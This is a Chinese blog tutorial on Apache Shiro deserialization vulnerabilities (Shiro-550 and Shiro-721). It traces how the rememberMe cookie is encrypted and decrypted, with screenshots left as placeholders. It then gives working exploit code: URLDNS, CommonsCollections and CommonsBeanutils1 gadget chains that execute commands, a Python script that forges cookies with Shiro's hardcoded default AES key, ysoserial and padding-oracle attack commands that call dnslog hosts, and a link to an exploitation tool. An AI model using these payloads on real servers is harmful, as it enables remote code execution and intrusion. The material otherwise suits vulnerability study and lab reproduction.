当前位置: 首页>后端>正文

shiro反序列化

shiro550

环境搭建

https://codeload.github.com/apache/shiro/zip/shiro-root-1.2.4

配置pom.xml

<dependencies>

? ? <dependency>

? ? ? ? <groupId>javax.servlet</groupId>

? ? ? ? <artifactId>jstl</artifactId>

? ? ? ? <scope>runtime</scope>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>javax.servlet</groupId>

? ? ? ? <artifactId>servlet-api</artifactId>

? ? ? ? <scope>provided</scope>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>org.slf4j</groupId>

? ? ? ? <artifactId>slf4j-log4j12</artifactId>

? ? ? ? <scope>runtime</scope>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>log4j</groupId>

? ? ? ? <artifactId>log4j</artifactId>

? ? ? ? <scope>runtime</scope>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>net.sourceforge.htmlunit</groupId>

? ? ? ? <artifactId>htmlunit</artifactId>

? ? ? ? <version>2.6</version>

? ? ? ? <scope>test</scope>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>org.apache.shiro</groupId>

? ? ? ? <artifactId>shiro-core</artifactId>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>org.apache.shiro</groupId>

? ? ? ? <artifactId>shiro-web</artifactId>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>org.mortbay.jetty</groupId>

? ? ? ? <artifactId>jetty</artifactId>

? ? ? ? <version>${jetty.version}</version>

? ? ? ? <scope>test</scope>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>org.mortbay.jetty</groupId>

? ? ? ? <artifactId>jsp-2.1-jetty</artifactId>

? ? ? ? <version>${jetty.version}</version>

? ? ? ? <scope>test</scope>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>org.slf4j</groupId>

? ? ? ? <artifactId>jcl-over-slf4j</artifactId>

? ? ? ? <scope>runtime</scope>

? ? </dependency>

? ? <dependency>

? ? ? ? <groupId>jstl</groupId>

? ? ? ? <artifactId>jstl</artifactId>

? ? ? ? <version>1.2</version>

? ? </dependency>

</dependencies>

可能出现的问题

无法解析插件 org.apache.maven.plugins:maven-clean-plugin:2.5

主要原理是因为maven默认用的是外网,会导致有些插件无法下载成功

解决方式:

将maven设置为国内镜像

修改maven3中的settings.xml文件

路径:xxxx\InteLiJ\plugins\maven\lib\maven3\conf

将标签的内容替换为

<mirror>

<id>mirrorId</id>

<mirrorOf>central</mirrorOf>

<name>Human Readable Name </name>

<url>http://repo1.maven.org/maven2/</url>

</mirror>

<!-- 阿里云镜像 -->

<mirror>

<id>alimaven</id>

<name>aliyun maven</name>

<url>http://central.maven.org/maven2</url>

<mirrorOf>central</mirrorOf>

</mirror>

<!-- 阿里云镜像 -->

<mirror>

<id>alimaven</id>

<name>aliyun maven</name>

<url>http://maven.aliyun.com/nexus/content/repositories/central/</url>

<mirrorOf>central</mirrorOf>

</mirror>

<!-- junit镜像地址 -->

<mirror>

<id>junit</id>

<name>junit Address/</name>

<url>http://jcenter.bintray.com/</url>

<mirrorOf>central</mirrorOf>

</mirror>

然后重启maven即可

只需要将压缩包中的web目录解压,然后作为网站根目录即可

漏洞分析

shiro反序列化,第1张

加密过程

shiro反序列化,第2张

在ildea里点击两下Shift,搜索rememberMeSuccessfulLogin

shiro反序列化,第3张
shiro反序列化,第4张
shiro反序列化,第5张
shiro反序列化,第6张
shiro反序列化,第7张

对用户名就行序列化操作

shiro反序列化,第8张

跟进serialize

shiro反序列化,第9张

继续跟进 跟进serialize,这里就是真实的序列化操作

shiro反序列化,第10张

执行完serialize函数加入encrypt

shiro反序列化,第11张

可以看到有一个cipherService.encrypt函数,它其实是将序列化的内容进行aes加密,而getEncryptionCipherKey函数是获取密钥的函数

shiro反序列化,第12张

跟进getEncryptionCipherKey函数,发现返回的是encryptionCioherKey这个属性

shiro反序列化,第13张

getEncryptionCipherKey为AbstractRememberMeManager类中的方法,因此我们自己看构造方法

这里定义了一个常量DEFAULT_CIPHER_KEY_BYTES

shiro反序列化,第14张
shiro反序列化,第15张
shiro反序列化,第16张

跟进到这里会发现setEncryptionCipherKey方法其实就是将DEFAULT_CIPHER_KEY_BYTES赋值给了encryptionCipherKey,在这里就获得了密钥

shiro反序列化,第17张

进入rememberSerializedIdentity方法,这个方法的作用其实就是添加cookie

shiro反序列化,第18张
shiro反序列化,第19张

加密过程就结束了

解密过程

搜索getRememberedIdentity

shiro反序列化,第20张
shiro反序列化,第21张
shiro反序列化,第22张

获取http的Request和Response

shiro反序列化,第23张

获取Cookie内容

shiro反序列化,第24张

这里就是解密过程

shiro反序列化,第25张
shiro反序列化,第26张
shiro反序列化,第27张
shiro反序列化,第28张
shiro反序列化,第29张
shiro反序列化,第30张
shiro反序列化,第31张
shiro反序列化,第32张

在这里调用了反序列化

shiro反序列化,第33张

由于原生的shrio是无法利用cc链的,因此我们在这里直接利用URLDNS这条链

URLDNS

import java.io.*;

import java.lang.reflect.Field;

import java.net.URL;

import java.util.HashMap;

public class urldns {

? ? public static void main(String[] args) throws Exception {

? ? ? ? HashMap<URL, String> hashMap = new HashMap<URL, String>();

? ? ? ? URL url = new URL("http://rmu2na.dnslog.cn");

? ? ? ? Field f = URL.class.getDeclaredField("hashCode");

? ? ? ? f.setAccessible(true);

? ? ? ? // 这步是防止写入时触发dns查询,详见下文序列化条件总结

? ? ? ? f.set(url, 1);

? ? ? ? hashMap.put(url, "foo");

? ? ? ? f.set(url, -1);

? ? ? ? ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.out"));

? ? ? ? oos.writeObject(hashMap);

? ? ? ? ObjectInputStream ois = new ObjectInputStream(new FileInputStream("test.out"));

? ? ? ? ois.readObject();

? ? }

}

由于反序列化的内容是二进制文件,因此需要利用脚本进行加密操作

import sys

import uuid

import base64

import subprocess

from Crypto.Cipher import AES

def get_file(name):

? ? with open(name,'rb') as f:

? ? ? ? data = f.read()

? ? return data

def en_aes(data):

? ? BS = AES.block_size

? ? pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()

? ? key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

? ? iv = uuid.uuid4().bytes

? ? encryptor = AES.new(key, AES.MODE_CBC, iv)

? ? base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))

? ? return base64_ciphertext

if __name__ == '__main__':

? ? data = get_file("test.out")

? ? print(en_aes(data))

这里需要将Cookie中的JSESSIONID=xxx;删除掉才会触发服务器重新读取Cookie

shiro反序列化,第34张
shiro反序列化,第35张

由于Shrio对resolveClass进行了修改,导致数组类无法加载,因此原生的cc链是无法直接使用的

有cc依赖

package com.naihe;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import javassist.CannotCompileException;

import javassist.ClassPool;

import javassist.CtClass;

import javassist.NotFoundException;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.keyvalue.TiedMapEntry;

import org.apache.commons.collections.map.LazyMap;

import java.io.*;

import java.lang.reflect.Field;

import java.util.HashMap;

import java.util.Map;

public class cc {

? ? public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, NotFoundException, CannotCompileException, ClassNotFoundException {

? ? ? ? //通过字节码构建恶意类

? ? ? ? ClassPool classPool= ClassPool.getDefault();

? ? ? ? String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";

? ? ? ? classPool.appendClassPath(AbstractTranslet);

? ? ? ? CtClass payload=classPool.makeClass("CommonsCollections3");

? ? ? ? payload.setSuperclass(classPool.get(AbstractTranslet));

? ? ? ? payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");

? ? ? ? byte[] bytes=payload.toBytecode();

? ? ? ? //CC3

? ? ? ? TemplatesImpl templates = new TemplatesImpl();

? ? ? ? Class<extends TemplatesImpl> aClass = templates.getClass();

? ? ? ? Field nameField = aClass.getDeclaredField("_name");

? ? ? ? nameField.setAccessible(true);

? ? ? ? nameField.set(templates,"aaaa");

? ? ? ? Field bytecodesField = aClass.getDeclaredField("_bytecodes");

? ? ? ? bytecodesField.setAccessible(true);

? ? ? ? bytecodesField.set(templates,new byte[][]{bytes});

? ? ? ? //CC2

? ? ? ? InvokerTransformer invokerTransformer = new InvokerTransformer("newTransformer", null, null);

? ? ? ? //CC6

? ? ? ? HashMap<Object, Object> map = new HashMap<>();

? ? ? ? Map lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));

? ? ? ? TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, templates);

? ? ? ? HashMap<Object, Object> map2 = new HashMap<>();

? ? ? ? map2.put(tiedMapEntry,"bbb");

? ? ? ? lazyMap.remove(templates);

? ? ? ? Class<LazyMap> c = LazyMap.class;

? ? ? ? Field factoryField = c.getDeclaredField("factory");

? ? ? ? factoryField.setAccessible(true);

? ? ? ? factoryField.set(lazyMap,invokerTransformer);

? ? ? ? serialize(map2);

? ? }

? ? public static void serialize(Object obj) throws IOException, ClassNotFoundException {

? ? ? ? ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));

? ? ? ? objectOutputStream.writeObject(obj);

? ? ? ? objectOutputStream.close();

? ? ? ? unserialize("test.out");

? ? }

? ? public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {

? ? ? ? ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));

? ? ? ? Object object = objectInputStream.readObject();

? ? ? ? return object;

? ? }

}

shiro反序列化,第36张

无cc依赖

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import javassist.ClassPool;

import javassist.CtClass;

import org.apache.commons.beanutils.BeanComparator;

import java.io.*;

import java.lang.reflect.Field;

import java.util.PriorityQueue;

public class CB1 {

? ? // 修改值的方法,简化代码

? ? public static void setFieldValue(Object object, String fieldName, Object value) throws Exception{

? ? ? ? Field field = object.getClass().getDeclaredField(fieldName);

? ? ? ? field.setAccessible(true);

? ? ? ? field.set(object, value);

? ? }

? ? public static void main(String[] args) throws Exception {

? ? ? ? // 创建恶意类,用于报错抛出调用链

? ? ? ? ClassPool pool = ClassPool.getDefault();

? ? ? ? CtClass payload = pool.makeClass("EvilClass");

? ? ? ? payload.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));

? ? ? ? payload.makeClassInitializer().setBody("new java.io.IOException().printStackTrace();");

? ? ? ? payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");

? ? ? ? byte[] evilClass = payload.toBytecode();

? ? ? ? TemplatesImpl templates = new TemplatesImpl();

? ? ? ? setFieldValue(templates, "_bytecodes", new byte[][]{evilClass});

? ? ? ? setFieldValue(templates, "_name", "test");

? ? ? ? setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());

? ? ? ? BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

? ? ? ? PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);

? ? ? ? queue.add("1");

? ? ? ? queue.add("1");

? ? ? ? setFieldValue(beanComparator, "property", "outputProperties");

? ? ? ? setFieldValue(queue, "queue", new Object[]{templates, templates});

? ? ? ? ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("test.out"));

? ? ? ? out.writeObject(queue);

? ? ? ? ObjectInputStream in = new ObjectInputStream(new FileInputStream("test.out"));

? ? ? ? in.readObject();

? ? }

}

shiro反序列化,第37张

shiro721

漏洞原理

Apapche Shiro RememberMe Cookie 默认通过 AES-128-CBC 模式加密 , 这种加密模式容易受到 Padding Oracle Attack( Oracle 填充攻击 ) , 攻击者可以使用有效的 RememberMe Cookie 作为 Paddding Oracle Attack 的前缀 , 然后精心构造 RememberMe Cookie 值来实现反序列化漏洞攻击.

复现步骤:

1. 登录网站并且获取 RememberMe Cookie 值

2. 使用 RememberMe Cookie 值来作为 Padding Oracle Attack 的前缀

3. 通过 Padding Oracle Attack 的攻击方式精心构造可利用的 YSoSerial 反序列化数据

4. 将构造好的反序列化数据填充到 RememberMe Cookie 字段中并发送 , 即可在目标服务器上执行任意代码

需要通过爆破获取密钥,才能生成正确的rememberme cookie

用java? -jar ysoserial-master-6eca5bc740-1.jar CommonsBeanutils1 "ping gj9qn9.dnslog.cn" > payload.class

python shiro_exp.py? http://127.0.0.1:8080/samples-web-1.4.1/account/? 7y9G8wmu+3c94D0kaxohut34n3ldwNnWxmrT9DQDEiSrQ7agYNnci1mh+IYQLmL8cehaMPcnBDclNaEN6eZrPvsEX7eApt5SJEZkmow+ZPsEsnh4wrnHoe7p8RjGVu6P/onx7nrFzZln9d4RC1N8vxEVPUlYZXU7xsMRs35Q8ziFH1EJ1jl/5eiDTn7Wx3yLbHCPyg6v+Qu5ADD+AMbvdHzlLOwY8Pfm5uqEKp36jIwsZjDcQJRhwyUjhAuRyqSUEFKzAq95XUYRaBKKsoxQwN6gD4z7G6lAIBY880CP0QIMhImmbHVfJti/rrnJ/RsxJtoeIH8TujlsEvcCGbJ3Od2XDbhilQUT57XralFArZB7tVCQE9/Vdce96jzR1TjD2rsPbg77eEUXOWbwkYBkJxFBex+p/YrLeJnxm9IvDijGHH2pZp9kCkej7uc8qPm+rH+V3xE0ChIxZXF5l9ScPsvHLJD+gAhgszg75pQnLiS5SOPG73GCj2gFFzzsKnCB? payload.class

shiro反序列化,第38张
shiro反序列化,第39张

检测工具

工具:

https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/download/v2.51/ShiroExploit.V2.51.7z


https://www.xamrdz.com/backend/3c31932376.html

相关文章: